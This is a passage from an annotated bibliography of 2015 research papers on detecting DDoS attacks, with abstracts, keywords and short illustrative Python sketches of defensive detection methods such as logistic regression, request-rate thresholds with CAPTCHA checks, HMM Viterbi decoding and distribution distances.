Abstract: The DDoS attack has been a threat to network security for a decade, and it will continue to be so in the near future. Nowadays the application layer DDoS attack poses a major challenge to web servers. The main objective of a web server is to offer uninterrupted application layer services to its benign users, but an application layer DDoS attack blocks the services of the web server to its legitimate clients, which can cause immense financial losses. Moreover, it requires very few resources to perform an application layer DDoS attack. The available solutions detect only a limited number of application layer DDoS attacks, and the solutions that detect all types of application layer DDoS attacks have huge complexity. To find an effective solution for the detection of application layer DDoS attacks, normal user browsing behavior has to be modeled in such a way that a normal user and an attacker can be differentiated. In this paper, we propose a method using feature construction and logistic regression to model normal web-user browsing behavior for detecting application layer DDoS attacks. The performance of the proposed method was evaluated in terms of metrics such as total accuracy, false positive rate, and detection rate. Comparison of the proposed solution with existing methods reveals that the proposed method performs better.
Keywords: computer network security; online front-ends; regression analysis; Web server services; application layer DDoS attack detection; detection rate metric; false positive rate metric; feature construction; financial losses; logistic regression; network security; normal Web user browsing behavior; performance evaluation; total accuracy metric; uninterrupted application layer services; user behavior modeling; Authentication; Computer crime; Feature extraction; Measurement; Pattern recognition; Web servers; Application Layer DDoS Attack; DDoS; Feature Construction; Logistic Regression; User Behavior (ID#: 16-9088)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7359289&isnumber=7359191
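
A rough sketch of the modeling step: construct behavioral features per session and fit a logistic regression that separates benign browsing from attack scripts. The three features and the toy sessions below are assumptions; the paper constructs its own feature set.

import numpy as np
from sklearn.linear_model import LogisticRegression

# columns: requests/min, mean think-time (s), fraction of repeated URLs
X = np.array([
    [  6, 12.0,  0.20], [  4, 20.0,  0.10], [  8,  9.0,  0.30],  # benign users
    [300,  0.1,  0.98], [450,  0.05, 0.99], [280,  0.2,  0.95],  # attack bots
])
y = np.array([0, 0, 0, 1, 1, 1])

model = LogisticRegression().fit(X, y)
session = np.array([[320, 0.08, 0.97]])
print("P(attack) =", model.predict_proba(session)[0, 1])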

 

Girma, A.; Garuba, M.; Jiang Li; Chunmei Liu, “Analysis of DDoS Attacks and an Introduction of a Hybrid Statistical Model to Detect DDoS Attacks on Cloud Computing Environment,” in Information Technology – New Generations (ITNG), 2015 12th International Conference on, vol., no., pp. 212–217, 13–15 April 2015. doi:10.1109/ITNG.2015.40
Abstract: Cloud service availability has been one of the major concerns of cloud service providers (CSPs) hosting different cloud-based information technology services while managing resources on the Internet. The vulnerability of the Internet, the distributed nature of cloud computing, various security issues related to cloud computing service models, and the cloud's main attributes all contribute to its susceptibility to security threats against cloud service availability. One of the most sophisticated threats, very difficult and challenging to counter because of its distributed nature, and one that has resulted in cloud service disruption, is the Distributed Denial of Service (DDoS) attack. Even though a number of intrusion detection solutions have been proposed by different research groups, and CSPs currently use various detection solutions while promising that their products are well secured, no solution perfectly prevents DDoS attacks. The characteristics of a DDoS attack, which takes on a different appearance in different scenarios, make it difficult to detect. This paper reviews and analyzes different existing DDoS detection techniques against different parameters, discusses their advantages and disadvantages, and proposes a hybrid statistical model that could significantly mitigate these attacks and be a better alternative for current detection problems.
Keywords: cloud computing; computer network security; statistical analysis; CSP; DDoS attack analysis; DDoS attack detection; Internet; cloud based information technology services; cloud computing environment; cloud computing service model; cloud main attributes; cloud service availability; cloud service disruption; cloud service providers; hybrid statistical model; intrusion detection solutions; security issues; Cloud computing; Computer crime; Covariance matrices; Entropy; Hidden Markov models; Servers; Cloud Security; Cloud Service Availability; Co-Variance Matrix; DDoS attacks (ID#: 16-9089)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7113475&isnumber=7113432

 

Ndibwile, J.D.; Govardhan, A.; Okada, K.; Kadobayashi, Y., “Web Server Protection Against Application Layer DDoS Attacks Using Machine Learning and Traffic Authentication,” in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, vol. 3, no., pp. 261–267, 1–5 July 2015. doi:10.1109/COMPSAC.2015.240
Abstract: Application layer Distributed Denial of Service (DDoS) attacks are among the deadliest kinds of attacks and have significant impact on destination servers and networks, owing to their ability to be launched with minimal computational resources while causing effects of high magnitude. Commercial and government Web servers have become the primary targets of these attacks, with recent mitigation efforts struggling to deaden the problem efficiently. Most application layer DDoS attacks can successfully mimic legitimate traffic without being detected by Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS). IDSs and IPSs can also mistake a normal, legitimate activity for a malicious one, producing a False Positive (FP) that affects Web users if it is ignored or dropped. False positives in a large and complex network topology can potentially be dangerous, as they may cause the IDS/IPS to block a user's benign traffic. Our contributions in this paper are, first, to mitigate undetected malicious traffic mimicking legitimate traffic by developing a special anti-DDoS module for general and specific DDoS tool attacks, using a classifier trained with a random tree machine-learning algorithm; we use labeled datasets to generate rules that incorporate into and fine-tune existing IDS/IPS such as Snort. Second, we further assist the IDS/IPS by processing traffic classified as malicious in order to identify FPs and route them to their intended destinations. To achieve this, our approach actively authenticates the traffic source of both legitimate and malicious traffic, at the Bait and Decoy servers respectively, before it is forwarded to the Web server.
Keywords: Internet; computer network security; file servers; learning (artificial intelligence); pattern classification; telecommunication traffic; FP; IDS; IPS; Web server protection; Web users; application layer DDoS attacks; bait-and-decoy server; destination servers; distributed denial of service; false positive; government Web servers; intrusion detection systems; intrusion prevention systems; legitimate traffic; malicious traffic; minimal computational resources; mitigation efforts; random tree machine-learning algorithm; traffic authentication; traffic source active authentication; trained classifier; Authentication; Computer crime; Logic gates; Training; Web servers; DDoS Mitigation; False Positives; IDS/IPS; Java Script; Machine Learning (ID#: 16-9090)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273365&isnumber=7273299

 

Olabelurin, A.; Veluru, S.; Healing, A.; Rajarajan, M., “Entropy Clustering Approach for Improving Forecasting in DDoS Attacks,” in Networking, Sensing and Control (ICNSC), 2015 IEEE 12th International Conference on, vol., no., pp. 315–320, 9–11 April 2015. doi:10.1109/ICNSC.2015.7116055
Abstract: Volume anomalies such as distributed denial-of-service (DDoS) attacks have been around for ages, but with advances in technology they have become stronger, shorter, and a weapon of choice for attackers. Digital forensic analysis of intrusions using alerts generated by existing intrusion detection systems (IDS) faces major challenges, especially for IDS deployed in large networks. In this paper, the concept of automatically sifting through a huge volume of alerts to distinguish the different stages of a DDoS attack is developed. The proposed novel framework is purpose-built to analyze multiple logs from the network for proactive forecasting and timely detection of DDoS attacks, through a combined approach of the Shannon-entropy concept and clustering of relevant feature variables. Experimental studies on a cyber-range simulation dataset from the project's industrial partners show that the technique is able to distinguish precursor alerts for DDoS attacks, as well as the attack itself, with a very low false positive rate (FPR) of 22.5%. Application of this technique greatly assists security experts in network analysis to combat DDoS attacks.
Keywords: computer network security; digital forensics; entropy; forecasting theory; pattern clustering; DDoS attacks; FPR; IDS; Shannon-entropy concept; clustering algorithm; cyber-range simulation dataset; digital forensic analysis; distributed denial-of-service; entropy clustering approach; false positive rate; forecasting; intrusion detection system; network analysis; proactive forecast; project industrial partner; volume anomaly; Algorithm design and analysis; Clustering algorithms; Computer crime; Entropy; Feature extraction; Ports (Computers); Shannon entropy; alert management; distributed denial-of-service (DDoS) detection; k-means clustering analysis; network security; online anomaly detection (ID#: 16-9091)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116055&isnumber=7115994

 

Mousavi, S.M.; St-Hilaire, M., “Early Detection of DDoS Attacks Against SDN Controllers,” in Computing, Networking and Communications (ICNC), 2015 International Conference on, vol., no., pp. 77–81, 16–19 Feb. 2015. doi:10.1109/ICCNC.2015.7069319
Abstract: A Software Defined Network (SDN) is a new network architecture that provides central control over the network. Although central control is the major advantage of SDN, it is also a single point of failure if it is made unreachable by a Distributed Denial of Service (DDoS) Attack. To mitigate this threat, this paper proposes to use the central control of SDN for attack detection and introduces a solution that is effective and lightweight in terms of the resources that it uses. More precisely, this paper shows how DDoS attacks can exhaust controller resources and provides a solution to detect such attacks based on the entropy variation of the destination IP address. This method is able to detect DDoS within the first five hundred packets of the attack traffic.
Keywords: IP networks; computer network security; software defined networking; telecommunication traffic; DDoS attacks; Distributed Denial Of Service attack; IP address destination; SDN controllers; attack detection; attack traffic; central control; entropy variation; exhaust controller resources; network architecture; software defined network; Computer architecture; Computer crime; Control systems; Entropy; Monitoring; Process control; Controller; DDoS attack; SDN (ID#: 16-9092)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7069319&isnumber=7069279

 

Satrya, G.B.; Chandra, R.L.; Yulianto, F.A., “The Detection of DDOS Flooding Attack Using Hybrid Analysis in IPv6 Networks,” in Information and Communication Technology (ICoICT ), 2015 3rd International Conference on, vol., no., pp. 240–244, 27–29 May 2015. doi:10.1109/ICoICT.2015.7231429
Abstract: The DDoS attack is popular among attackers for disrupting computer networks. The evolution of attacks and the increase in vulnerable hosts on the Internet have made DDoS attacks more varied and more difficult to detect in real time. Today's popular IP protocol development is IPv6, a new technology that brings its own vulnerabilities and allows attackers to attack systems. This issue can be an obstacle to making a DDoS attack detection algorithm more efficient and accurate. Consequently, this paper discusses the development of a prototype to detect DDoS attacks using source-address analytical methods and analysis of network flows. The prototype can detect DDoS attacks on IPv6 with 85% accuracy for the most severe test scenarios. As for detection time, the prototype can recognize DDoS within 2 minutes 56 seconds.
Keywords: IP networks; computer network security; DDOS flooding attack detection; Distributed Denial of Service flooding attack detection; IPv6 network; Internet; computer network; network flow analysis; source addresses analytical method; Computer crime; Floods; Protocols; Prototypes; DDOS detection; IPv6; hybrid; network flow; source address analysis (ID#: 16-9093)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7231429&isnumber=7231384

 

Mizukoshi, M.; Munetomo, M., “Distributed Denial of Services Attack Protection System with Genetic Algorithms on Hadoop Cluster Computing Framework,” in Evolutionary Computation (CEC), 2015 IEEE Congress on, vol., no., pp. 1575–1580, 25–28 May 2015. doi:10.1109/CEC.2015.7257075
Abstract: DDoS attacks have become one of the serious menaces of Internet security. They are difficult to prevent because DDoS attackers send spoofed packets to the victim, which makes identifying the origin of the attack very difficult. A series of techniques have been studied, such as pattern matching that learns attack patterns, and abnormal traffic detection. However, the pattern matching approach is not reliable, because attackers continually launch attacks with different traffic patterns, while pattern matching learns only from past DDoS data. Therefore, a reliable system has to watch what kinds of attacks are being carried out now and investigate how to prevent them. Moreover, the amount of traffic flowing through the Internet increases rapidly, so packet analysis should be done within a reasonable amount of time. This paper proposes a scalable, real-time traffic pattern analysis based on a genetic algorithm to detect and prevent DDoS attacks on the Hadoop distributed processing infrastructure. Experimental results demonstrate the effectiveness of our scalable DDoS protection system.
Keywords: computer network security; data handling; genetic algorithms; parallel processing; telecommunication traffic; DDoS attack prevention; Hadoop cluster computing framework; Hadoop distributed processing infrastructure; Internet security; distributed denial-of-service attack protection system; genetic algorithms; scalable DDoS protection system; spoofing packets; traffic pattern analysis; Accuracy; Computer crime; Distributed processing; Genetic algorithms; Genetics; IP networks; Sparks; DDoS attack; Genetic Algorithm; Hadoop (ID#: 16-9094)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7257075&isnumber=7256859

 

Zheludev, M.; Nagradov, E., “Traffic Anomaly Detection and DDOS Attack Recognition Using Diffusion Map Technologies,” in Computer Science and Information Technologies (CSIT), 2015, vol., no., pp. 128–132, Sept. 28 2015–Oct. 2 2015. doi:10.1109/CSITechnol.2015.7358265
Abstract: This paper provides a method for mathematically representing the traffic flow of network states. Anomalous behavior in this model is represented as points that are not grouped into the clusters allocated by the “alpha-stream” process.
Keywords: computer network security; telecommunication traffic; DDOS attack recognition; diffusion map technology; mathematical representation; network state; traffic anomaly detection; traffic flow; Classification algorithms; Clustering algorithms; Computer crime; Geometry; Measurement; Telecommunication traffic; Training; Kernel methods; data analysis; diffusion maps (ID#: 16-9095)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7358265&isnumber=7358212

 

Singh, K.J.; De, T., “DDOS Attack Detection and Mitigation Technique Based on Http Count and Verification Using CAPTCHA,” in Computational Intelligence and Networks (CINE), 2015 International Conference on, vol., no., pp. 196–197, 12–13 Jan. 2015. doi:10.1109/CINE.2015.47
Abstract: With the rapid development of the Internet, the number of people who are online has increased tremendously, but alongside the growing positive uses of the Internet we also find negative ones: misuse and abuse of the Internet are growing at an alarming rate. There are many cases of viruses and worms infecting systems that have software vulnerabilities, and these systems can even become clients for bot herders. Such infected systems aid in launching DDoS attacks against a target server. In this paper we introduce the concept of IP blacklisting, which blocks every blacklisted IP address; an HTTP count filter, which enables us to distinguish normal from suspected IP addresses; and the CAPTCHA technique, which checks whether these suspected IP addresses are under the control of a human or a botnet.
Keywords: Internet; client-server systems; computer network security; computer viruses; transport protocols; CAPTCHA; DDOS attack detection; DDOS attack mitigation technique; HTTP count filter; HTTP verification; IP address; IP blacklisting; botnet; software vulnerability; target server; virus; worms; CAPTCHAs; Computer crime; IP networks; Radiation detectors; Servers; bot; botnets; captcha; filter; http; mitigation (ID#: 16-9096)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7053830&isnumber=7053782
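
The HTTP-count-plus-CAPTCHA pipeline in the abstract can be sketched as a sliding-window request counter per source IP: IPs exceeding a threshold are challenged with a CAPTCHA, and confirmed bots are blacklisted. The window size, threshold, and CAPTCHA hand-off below are illustrative assumptions.

import time
from collections import defaultdict

WINDOW = 10.0        # seconds
SUSPECT_LIMIT = 50   # requests per window before a CAPTCHA challenge

hits = defaultdict(list)
blacklist = set()

def handle_request(ip: str) -> str:
    if ip in blacklist:
        return "blocked"
    now = time.time()
    hits[ip] = [t for t in hits[ip] if now - t < WINDOW]   # slide the window
    hits[ip].append(now)
    if len(hits[ip]) > SUSPECT_LIMIT:
        return "challenge"       # serve a CAPTCHA; humans pass, bots fail
    return "allowed"

def captcha_failed(ip: str):
    blacklist.add(ip)            # bot confirmed: block the entire IP

for _ in range(60):
    verdict = handle_request("203.0.113.7")
print(verdict)                          # 'challenge' once past the limit
captcha_failed("203.0.113.7")
print(handle_request("203.0.113.7"))    # 'blocked'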

 

Osanaiye, O.A., “Short Paper: IP Spoofing Detection for Preventing DDoS Attack in Cloud Computing,” in Intelligence in Next Generation Networks (ICIN), 2015 18th International Conference on, vol., no., pp. 139–141, 17–19 Feb. 2015. doi:10.1109/ICIN.2015.7073820
Abstract: The Distributed Denial of Service (DDoS) attack has been identified as the biggest security threat to service availability in Cloud Computing. It prevents legitimate Cloud Users from accessing the pool of resources provided by Cloud Providers by flooding and consuming network bandwidth to exhaust servers and computing resources. A major attribute of a DDoS attack is the spoofing of the IP address, which hides the identity of the attacker. This paper discusses different methods for detecting spoofed IP packets in Cloud Computing and proposes Host-Based Operating System (OS) fingerprinting, which uses both passive and active methods to match the operating system of an incoming packet against its database. Additionally, it demonstrates how the proposed technique can be implemented in a Cloud Computing environment.
Keywords: IP networks; cloud computing; computer network security; operating systems (computers); resource allocation; DDoS attack prevention; IP spoofing detection; active method; cloud providers; cloud users; computing resources; distributed denial of service attack; host-based OS fingerprinting; host-based operating system fingerprinting; network bandwidth flooding; passive method; security threat; service availability; spoofed IP packet detection; Cloud computing; Computer crime; Databases; Fingerprint recognition; IP networks; Probes; Cloud Computing; DDoS attack; IP Spoofing; OS Fingerprinting (ID#: 16-9097)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7073820&isnumber=7073795

 

Bongiovanni, W.; Guelfi, A.E.; Pontes, E.; Silva, A.A.A.; Fen Zhou; Kofuji, S.T., “Viterbi Algorithm for Detecting DDoS Attacks,” in Local Computer Networks (LCN), 2015 IEEE 40th Conference on, vol., no., pp. 209–212, 26–29 Oct. 2015. doi:10.1109/LCN.2015.7366308
Abstract: Distributed denial of service attacks aim at making a given computational resource unavailable to users. A substantial portion of commercial Intrusion Detection Systems operates only with detection techniques based on rules for the recognition of pre-established behavioral patterns (called signatures) that can be used to identify these types of attacks. However, the characteristics of these attacks are adaptable, thus compromising the efficiency of IDS mechanisms. The goal of this paper is therefore to evaluate the feasibility of using the Hidden Markov Model, via the Viterbi algorithm, to detect distributed denial of service attacks in data communication networks. Two main contributions of this work can be described: the ability to identify anomalous behavior patterns in the data traffic with the Viterbi algorithm, and the ability to obtain feasible levels of accuracy in the detection of distributed denial of service attacks.
Keywords: Viterbi detection; computer network security; data communication; hidden Markov models; DDoS attack detection; IDS mechanism; Viterbi algorithm; anomalous behavior pattern identification; attack identification; computational resource; data communication network; data traffic; distributed denial of service attack; hidden Markov model; intrusion detection system; signature recognition; Computer crime; Computer networks; Hidden Markov models; Intrusion detection; Markov processes; Protocols (ID#: 16-9098)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7366308&isnumber=7366232
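
For readers unfamiliar with the decoding step the paper relies on, the sketch below implements the classic Viterbi algorithm for a two-state HMM (normal vs. attack) over a sequence of coarse traffic observations; the probabilities are illustrative assumptions, not trained values from the paper.

import numpy as np

states = ["normal", "attack"]
start = np.log([0.9, 0.1])                 # initial state probabilities
trans = np.log([[0.9, 0.1],                # P(next state | current state)
                [0.2, 0.8]])
emit = np.log([[0.9, 0.1],                 # P(obs | state): obs 0 = low rate
               [0.05, 0.95]])              #                 obs 1 = high rate

def viterbi(obs):
    n, k = len(obs), len(states)
    score = np.full((n, k), -np.inf)       # best log-prob ending in state j at t
    back = np.zeros((n, k), dtype=int)     # argmax predecessors for backtracking
    score[0] = start + emit[:, obs[0]]
    for t in range(1, n):
        for j in range(k):
            cand = score[t - 1] + trans[:, j]
            back[t, j] = int(np.argmax(cand))
            score[t, j] = cand[back[t, j]] + emit[j, obs[t]]
    path = [int(np.argmax(score[-1]))]     # backtrack from the best end state
    for t in range(n - 1, 0, -1):
        path.append(back[t, path[-1]])
    return [states[s] for s in reversed(path)]

print(viterbi([0, 0, 1, 1, 1, 0]))
# ['normal', 'normal', 'attack', 'attack', 'attack', 'normal']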

 

Hong Jiang; Shuqiao Chen; Hongchao Hu; Mingming Zhang, “Superpoint-Based Detection Against Distributed Denial of Service (DDoS) Flooding Attacks,” in Local and Metropolitan Area Networks (LANMAN 2015), The 21st IEEE International Workshop on, vol., no., pp. 1–6, 22–24 April 2015. doi:10.1109/LANMAN.2015.7114724
Abstract: The DDoS flooding attack is a critical threat to the normal operation of networks. However, current feature-based detection methods are easily cheated by hackers, and most of these mechanisms do not differentiate between DDoS flooding attacks and legitimate random flash crowds, which are feature-independent and location-extended. To address these challenges, we propose a two-stage detection strategy combining superpoints and flow similarity measurement. To locate suspicious flows, the polymerization degree of destination superpoints is introduced within a moving time window mechanism. Based on the suspicious flows, a sliding-detection algorithm is presented for distinguishing flooding attacks from flash crowds using similarity metrics. Computer simulation results indicate that our detection approach can detect DDoS flooding attacks efficiently and that Total Variation Distance (TVD) is the most suitable metric for discriminating DDoS flooding attack flows from flash crowds. Built on flow arrivals, the proposed mechanism is practical for attack detection on high-speed links.
Keywords: computer network security; DDoS flooding attack; TVD; distributed denial of service flooding attacks; feature independent; location extended; moving time window mechanism; sliding-detection algorithm; superpoint-based detection; total variation distance; two-stage detection strategy; Computer crime; Computer hacking; Feature extraction; Floods; IP networks; Measurement; Polymers; DDoS flooding attacks; detection strategy; flow similarity measurement; superpoints (ID#: 16-9099)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7114724&isnumber=7114713
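
Total Variation Distance, the metric the authors found most discriminative, is simply half the L1 distance between two normalized distributions: TVD(P, Q) = 0.5 * sum_i |p_i - q_i|. The example distributions below are assumptions chosen to show why a flash crowd barely moves the metric while a bot flood does.

import numpy as np

def tvd(p, q):
    p = np.asarray(p, dtype=float); p /= p.sum()   # normalize to distributions
    q = np.asarray(q, dtype=float); q /= q.sum()
    return 0.5 * np.abs(p - q).sum()

baseline = [30, 25, 20, 15, 10]        # normal per-source request shares
flash_crowd = [33, 24, 19, 14, 10]     # many humans: the shape barely changes
ddos = [90, 3, 3, 2, 2]                # bots: mass piles onto a few patterns

print(f"TVD(baseline, flash crowd) = {tvd(baseline, flash_crowd):.3f}")  # small
print(f"TVD(baseline, DDoS)        = {tvd(baseline, ddos):.3f}")         # large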

 

Bhuyan, M.H.; Kalwar, A.; Goswami, A.; Bhattacharyya, D.K.; Kalita, J.K., “Low-Rate and High-Rate Distributed DoS Attack Detection Using Partial Rank Correlation,” in Communication Systems and Network Technologies (CSNT), 2015 Fifth International Conference on, vol., no., pp. 706–710, 4–6 April 2015. doi:10.1109/CSNT.2015.24
Abstract: Distributed Denial of Service (DDoS) attacks pose a serious threat to efficient and uninterrupted Internet services. During a DDoS attack, attackers fool innocent servers (i.e., slaves) into flooding packets toward the victim. Most low-rate DDoS attack detection mechanisms are associated with the specific protocols used by the attacks. Because of the use of slaves, it has been found that the traffic flow of such an attack and its response flow to the victim may have linear relationships with one another. Based on this observation, we propose the Partial Rank Correlation-based Detection (PRCD) scheme to detect both low-rate and high-rate DDoS attacks. Our experimental results confirm the theoretical analysis and demonstrate the effectiveness of the proposed scheme in practice.
Keywords: computer network security; protocols; PRCD scheme; high-rate distributed denial of service attacks; low-rate DDoS attack detection mechanisms; partial rank correlation; partial rank correlation-based detection scheme; protocols; traffic flow; uninterrupted Internet services; Accuracy; Bandwidth; Computer crime; Correlation; Entropy; Internet; Servers; DDoS; attack; high-rate; low-rate; network traffic; rank correlation (ID#: 16-9100)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7280010&isnumber=7279856
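
The partial rank correlation at the heart of PRCD can be computed from pairwise Spearman coefficients: r_xy.z = (r_xy - r_xz * r_yz) / sqrt((1 - r_xz^2)(1 - r_yz^2)), which measures the rank correlation of X and Y after controlling for a third variable Z. The synthetic flows below are illustrative assumptions, not the paper's data.

import numpy as np
from scipy.stats import spearmanr

def partial_rank_corr(x, y, z):
    r_xy = spearmanr(x, y).correlation
    r_xz = spearmanr(x, z).correlation
    r_yz = spearmanr(y, z).correlation
    return (r_xy - r_xz * r_yz) / np.sqrt((1 - r_xz**2) * (1 - r_yz**2))

rng = np.random.default_rng(1)
z = rng.normal(100, 10, 200)              # background traffic level
x = 2 * z + rng.normal(0, 5, 200)         # flow toward the victim
y = 1.5 * x + rng.normal(0, 5, 200)       # the victim's response flow

print(f"partial rank correlation = {partial_rank_corr(x, y, z):.3f}")
# a value near 1 flags the linear attack/response relationship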

 

Pandiaraja, P.; Manikandan, J., “Web Proxy Based Detection and Protection Mechanisms Against Client Based HTTP Attacks,” in Circuit, Power and Computing Technologies (ICCPCT), 2015 International Conference on, vol., no., pp. 1–6, 19–20 March 2015. doi:10.1109/ICCPCT.2015.7159344
Abstract: This paper presents server-side protection from client-based DDoS attacks over multilevel proxies. DDoS attacks are a continuous threat to network applications. Such attacks are created by sets of attackers who generate a huge amount of traffic and force it onto the network, inflicting significant injury on the victim server. In a computer network, a client sends an HTTP request to the server to obtain application resources through a proxy server; the proxy protects, filters, and monitors applications against such DDoS attacks. But a client can access the server through different web proxies, and a web server has no technique for identifying a malicious client or the users behind it, because in proxy-to-server traffic the proxy conceals the client information and the server knows only the proxy's information. Here a Hidden semi-Markov Model (HsMM) is proposed to describe the time-varying and special behaviors of the traffic. In existing systems, discovery of attacks is based only on proxy-server and client-system behavior rather than on the actual client user; in such cases an innocent web proxy or a whole client system may be blocked, affecting many innocent users on that client system. To avoid this problem, a user-based approach is employed to find the locality behaviors of the user's system with an enhanced HTTP protocol, adding a custom header to the HTTP protocol to detect the actual attacking user on the client. A threshold-based algorithm (TBAD) with encryption and decryption algorithms is also proposed for reshaping suspicious requests into normal requests. This method can protect the QoS of the legitimate users of the client system.
Keywords: computer network security; cryptography; hidden Markov models; hypermedia; telecommunication traffic; transport protocols; HTTP attacks; HTTP protocol; HTTP request; HsMM; QoS; TBAD; Web proxies; Web proxy based detection mechanism; Web proxy based protection mechanism; Web server; attack discovery; client based DDoS attacks; client system behavior; computer network; decryption algorithm; encryption algorithm; hidden semiMarkov model; locality behaviors; multilevel proxy; proxy server; server side protection; threshold based algorithm; time varying traffic behaviors; user based approach; Computer crime; Computers; Floods; IP networks; Protocols; Web servers; Data Extraction; Threshold value; attack discovery; distributed denial of service attack; traffic modeling (ID#: 16-9101)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7159344&isnumber=7159156

 

Tang, C.; Tang, A.; Lee, E.; Lixin Tao, “Mitigating HTTP Flooding Attacks with Meta-data Analysis,” in 2015 IEEE 17th International Conference on High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), and 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS),  vol., no., pp. 1406–1411, 24–26 Aug. 2015. doi:10.1109/HPCC-CSS-ICESS.2015.203
Abstract: The rise of Distributed Denial of Service (DDoS) attacks has posed a dire threat to cloud computing services in recent years. First, it is getting increasingly difficult to discriminate legitimate traffic from malicious traffic, since both are legal at the application-protocol level. Second, DDoS attacks have tremendous impacts on virtual machine performance due to the over-subscribed sharing nature of a cloud data center. To prevent the most serious HTTP GET flooding attacks, we propose a meta-data based monitoring approach, in which the behavior of malicious HTTP requests is captured through real-time and big-data analysis. The proposed DDoS defense system can provide continued service to legitimate clients even when the attacking line-rate is as high as 9 Gbps. An intelligent probe is first used to extract the meta-data about an HTTP connection, which can be thought of as an (IP, URL) pair (URL: Uniform Resource Locator). Then, a real-time big-data analyzing technique is applied on top of the meta-data to identify the IP addresses whose HTTP request frequency significantly surpasses the norm. The blacklist, consisting of these IP addresses, is further aggregated, enabling inline devices (firewalls and load balancers) to apply rate-limiting rules to mitigate the attacks. Our findings show that the performance of the meta-data based detection system is one order of magnitude better than the previous approach.
Keywords: Big Data; cloud computing; computer centres; data analysis; firewalls; meta data; telecommunication traffic; transport protocols; virtual machines; Big-Data analysis; DDoS attack; DDoS defense system; HTTP GET flooding attack mitigation; HTTP connection; HTTP request frequency; IP address; application-protocol level; cloud computing services; cloud data center; distributed denial of service attack; firewall; inline devices; intelligent probe; legitimate traffic; load balancer; malicious HTTP request; malicious traffic; meta-data analysis; meta-data based detection system; meta-data based monitoring approach; rate-limiting rule; virtual machine performance; Computer crime; Floods; IP networks; Protocols; Real-time systems; Servers; Uniform resource locators; DDoS; HTTP GET flooding; network protocol parser (ID#: 16-9102)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336365&isnumber=7336120

 

Godefroy, E.; Totel, E.; Hurfin, M.; Majorczyk, F., “Generation and Assessment of Correlation Rules to Detect Complex Attack Scenarios,” in Communications and Network Security (CNS), 2015 IEEE Conference on, vol., no., pp. 707–708, 28–30 Sept. 2015. doi:10.1109/CNS.2015.7346896
Abstract: Information systems can be targeted by different types of attacks. Some are easily detected (like a DDoS targeting the system), while others are stealthier and consist of successive attack steps that compromise different parts of the targeted system. The alarms referring to detected attack steps are often hidden in a tremendous number of notifications that include false alarms. Alert correlators use correlation rules (which can be explicit, implicit, or semi-explicit [3]) to solve this problem by extracting complex relationships between the different generated events and alerts. On the other hand, providing maintainable, complete, and accurate correlation rules specifically adapted to an information system is very difficult work. We propose an approach that, given proper input information, can build a complete and system-dependent set of correlation rules derived from a high-level attack scenario. We then evaluate the applicability of this method by applying it to a real system and, in a second phase, assessing its fault tolerance in a simulated environment.
Keywords: computer network security; fault tolerance; information systems; complex attack detection; correlation rule assessment; false alarm; fault tolerance; high level attack scenario; information system; Correlation; Correlators; Intrusion detection; Knowledge based systems; Observers; Sensors; Software; Alert correlation; Intrusion detection; Security and protection (ID#: 16-9103)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7346896&isnumber=7346791

 

Jog, M.; Natu, M.; Shelke, S., “Distributed Capabilities-Based DDoS Defense,” in Pervasive Computing (ICPC), 2015 International Conference on, vol., no., pp. 1–6, 8–10 Jan. 2015. doi:10.1109/PERVASIVE.2015.7086993
Abstract: Existing strategies against DDoS are implemented as single-point solutions at different network locations. Our understanding is that no single network location can cater to the needs of a foolproof defense solution, given the nature of DDoS and the activities required for its mitigation. This paper gives collective information about some important defense mechanisms, discussing their advantages and limitations. Based on our understanding, we propose a distribution of DDoS defense that uses improved techniques for capabilities-based traffic differentiation and scheduling-based rate-limiting. Additionally, we propose a novel approach for attack prediction to determine prospective attackers as well as the time-to-saturation of the victim. We present two algorithms for this distribution of defense. The proposed distributed approach, built with these incremental improvements in the defense activities, is expected to provide a better solution to the DDoS problem.
Keywords: computer network security; DDoS defense; capabilities-based traffic differentiation; distributed denial-of-service; incremental improvements; scheduling-based rate-limiting; single-point solutions; Aggregates; Bandwidth; Computer crime; Filtering; Floods; IP networks; Limiting; Attack detection; Distributed Denial-of-Service; Distributed defense; Network security; Rate-limiting; Traffic differentiation (ID#: 16-9104)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7086993&isnumber=7086957

 

Bazm, M.; Khatoun, R.; Begriche, Y.; Khoukhi, L.; Xiuzhen Chen; Serhrouchni, A., “Malicious Virtual Machines Detection Through a Clustering Approach,” in Cloud Technologies and Applications (CloudTech), 2015 International Conference on, vol., no., pp. 1–8, 2–4 June 2015. doi:10.1109/CloudTech.2015.7336986
Abstract: Cloud computing aims to provide enormous resources and services, parallel processing, and reliable access for users on networks. The flexible resources of clouds can, however, be used by malicious actors to attack other infrastructures. The cloud can serve as a platform to perform these attacks: a virtual machine (VM) in the cloud can play the role of a malicious VM belonging to a botnet and send heavy traffic to the victim. For cloud service providers, preventing their infrastructure from being turned into an attack platform is very challenging, since it requires detecting attacks at the source in a highly dynamic and heterogeneous environment. In this paper, an approach to detecting these malicious behaviors in the cloud, based on the analysis of network parameters, is proposed. The approach is a source-based attack detection that applies both entropy and clustering methods to network parameters. The cloud environment is simulated on CloudSim. The data clustering achieves high performance, with a high percentage of correctly clustered VMs.
